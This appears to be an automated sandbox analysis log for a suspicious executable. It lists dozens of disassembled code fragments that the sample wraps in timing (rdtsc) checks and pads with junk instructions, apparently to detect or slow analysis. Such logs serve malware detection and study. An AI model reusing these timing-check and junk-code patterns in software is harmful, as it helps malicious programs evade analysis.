Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF68AC second address: EF68C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E00A62 second address: E00A79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDE70D000D1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA69 second address: EFCA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFCA6F second address: EFCA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F098A1 second address: F098A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F29 second address: F18F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F2F second address: F18F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F35 second address: F18F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F3D second address: F18F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18F41 second address: F18F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F18DC8 second address: F18DCD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B737 second address: F1B73D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1B73D second address: F1B743 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F336AC second address: F336B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33ADE second address: F33AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33AE2 second address: F33AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33DCA second address: F33DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F33DD6 second address: F33DEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F34105 second address: F34122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F35D0E second address: F35D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F37400 second address: F37408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F37408 second address: F3740C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3740C second address: F37420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FDE71263CE6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39DCA second address: F39DD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FD4 second address: F39FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FD8 second address: F39FDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F39FDE second address: F3A020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dl, 13h 0x0000000c push 00000004h 0x0000000e mov dx, 96B2h 0x00000012 push D97839DEh 0x00000017 pushad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FDE71263CEFh 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jc 00007FDE71263CE6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A020 second address: F3A024 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A32E second address: F3A342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A342 second address: F3A34C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A34C second address: F3A35A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3A35A second address: F3A35E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D74B second address: F3D769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D769 second address: F3D76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D76D second address: F3D78E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 je 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D78E second address: F3D7B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D8h 0x00000007 jmp 00007FDE70D000CEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3D7B8 second address: F3D7D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDE71263CF8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BC3 second address: 5000BEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FDE70D00128h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDE70D000D5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BEF second address: 5000BFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000BFF second address: 5000C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add eax, ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FDE70D000D8h 0x00000012 and esi, 5FCCB318h 0x00000018 jmp 00007FDE70D000CBh 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 mov eax, dword ptr [eax+00000860h] 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDE70D000D1h 0x0000002f and ecx, 3DFDDCB6h 0x00000035 jmp 00007FDE70D000D1h 0x0000003a popfd 0x0000003b popad 0x0000003c test eax, eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDE70D000D8h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000C88 second address: 5000CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDEE1C99DAEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5000CA3 second address: 5000CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AA55 second address: E4AA5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AA5B second address: E4AA5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E4AE46 second address: E4AE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502005C second address: 5020071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020071 second address: 5020075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020075 second address: 5020099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE70D000D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020099 second address: 502009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502009F second address: 50200A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200A3 second address: 50200DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDE71263CF2h 0x00000012 sub ch, 00000008h 0x00000015 jmp 00007FDE71263CEBh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ecx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200DB second address: 50200DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50200DF second address: 50200E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020109 second address: 502010F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 502010F second address: 5020113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5020113 second address: 5020125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, 1F866D3Fh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501070A second address: 5010738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDE71263CF7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010738 second address: 5010797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE70D000CFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FDE70D000CFh 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop edx 0x00000018 jmp 00007FDE70D000CEh 0x0000001d popad 0x0000001e jmp 00007FDE70D000D2h 0x00000023 popad 0x00000024 lea eax, dword ptr [ebp-04h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FDE70D000CAh 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010797 second address: 50107A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107A6 second address: 50107AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 1Ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107AD second address: 50107D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FDE71263CEAh 0x0000000f xor cx, 3208h 0x00000014 jmp 00007FDE71263CEBh 0x00000019 popfd 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50107D5 second address: 5010836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDE70D000D4h 0x0000000a adc eax, 1B145468h 0x00000010 jmp 00007FDE70D000CBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FDE70D000D9h 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007FDE70D000D3h 0x00000027 mov ah, FBh 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010869 second address: 50108AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, CB59h 0x00000008 popad 0x00000009 push ecx 0x0000000a pushfd 0x0000000b jmp 00007FDE71263CF5h 0x00000010 jmp 00007FDE71263CEBh 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 cmp dword ptr [ebp-04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FDE71263CF2h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108AF second address: 50108F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 mov dl, E0h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDE70D000D2h 0x00000013 xor ecx, 5F9992A8h 0x00000019 jmp 00007FDE70D000CBh 0x0000001e popfd 0x0000001f mov dx, cx 0x00000022 popad 0x00000023 je 00007FDE70D000F4h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108F1 second address: 50108F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50108F7 second address: 50108FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010072 second address: 501007A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501007A second address: 50100B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, dx 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b jmp 00007FDE70D000D7h 0x00000010 push FFFFFFFEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007FDE70D000CBh 0x0000001a pop esi 0x0000001b mov dh, 5Eh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50100B0 second address: 50100E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FDE71263CE9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, ebx 0x00000013 call 00007FDE71263CF7h 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50100E6 second address: 5010107 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010107 second address: 5010123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010123 second address: 5010135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE70D000CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010135 second address: 501015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE71263CF8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501015D second address: 5010163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010163 second address: 501019C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FDE71263CEAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 push edi 0x00000013 mov edi, eax 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jmp 00007FDE71263CF2h 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501019C second address: 50101A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101A0 second address: 50101A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101A6 second address: 50101FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 29D7EAA5h 0x0000000e jmp 00007FDE70D000D1h 0x00000013 add dword ptr [esp], 4BCD40CBh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007FDE70D000CAh 0x00000023 xor ax, 9308h 0x00000028 jmp 00007FDE70D000CBh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50101FA second address: 5010269 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 mov edi, esi 0x0000000a pop ecx 0x0000000b popad 0x0000000c mov eax, dword ptr fs:[00000000h] 0x00000012 jmp 00007FDE71263CF3h 0x00000017 nop 0x00000018 pushad 0x00000019 mov ebx, ecx 0x0000001b jmp 00007FDE71263CF0h 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FDE71263CF1h 0x00000029 and ax, 6E36h 0x0000002e jmp 00007FDE71263CF1h 0x00000033 popfd 0x00000034 mov bh, al 0x00000036 popad 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010269 second address: 501026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501026D second address: 5010271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010271 second address: 5010277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5010277 second address: 501029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501029B second address: 50102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50102B6 second address: 50102FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FDE71263CEEh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007FDE71263CF7h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50102FE second address: 501032F instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, 16D8h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDE70D000D9h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501032F second address: 501035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 jmp 00007FDE71263CEFh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501035C second address: 501039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FDE70D000CEh 0x0000000f push eax 0x00000010 jmp 00007FDE70D000CBh 0x00000015 xchg eax, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 501039A second address: 501039F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
